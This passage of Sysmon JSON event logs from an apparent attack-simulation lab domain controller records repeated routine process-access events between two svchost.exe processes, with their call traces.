C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:57.188","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F63-5F25-0000-001044B90000}","TargetProcessId":"1140","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:58","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:57","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2666,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:57.188\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F63-5F25-0000-001044B90000}\r\nTargetProcessId: 1140\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:57.188","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F63-5F25-0000-001044B90000}","TargetProcessId":"1140","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:58","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:57","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2667,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:57.188\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F63-5F25-0000-001044B90000}\r\nTargetProcessId: 1140\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:57.188","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F63-5F25-0000-001044B90000}","TargetProcessId":"1140","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:58","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:57","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2668,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:57.188\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F63-5F25-0000-001044B90000}\r\nTargetProcessId: 1140\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:57.188","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F63-5F25-0000-001044B90000}","TargetProcessId":"1140","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:58","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:57","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2669,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:57.188\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F63-5F25-0000-001044B90000}\r\nTargetProcessId: 1140\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:57.188","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F63-5F25-0000-001044B90000}","TargetProcessId":"1140","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:58","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:57","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2670,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:57.188\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F63-5F25-0000-001044B90000}\r\nTargetProcessId: 1140\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:57.188","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F63-5F25-0000-001044B90000}","TargetProcessId":"1140","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:58","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:57","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2671,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:57.188\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F63-5F25-0000-001044B90000}\r\nTargetProcessId: 1140\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:57.188","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F63-5F25-0000-001044B90000}","TargetProcessId":"1140","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:58","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:57","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2672,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:57.188\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F63-5F25-0000-001044B90000}\r\nTargetProcessId: 1140\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:57.188","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F63-5F25-0000-001044B90000}","TargetProcessId":"1140","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:58","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:57","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2673,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:57.188\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F63-5F25-0000-001044B90000}\r\nTargetProcessId: 1140\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: 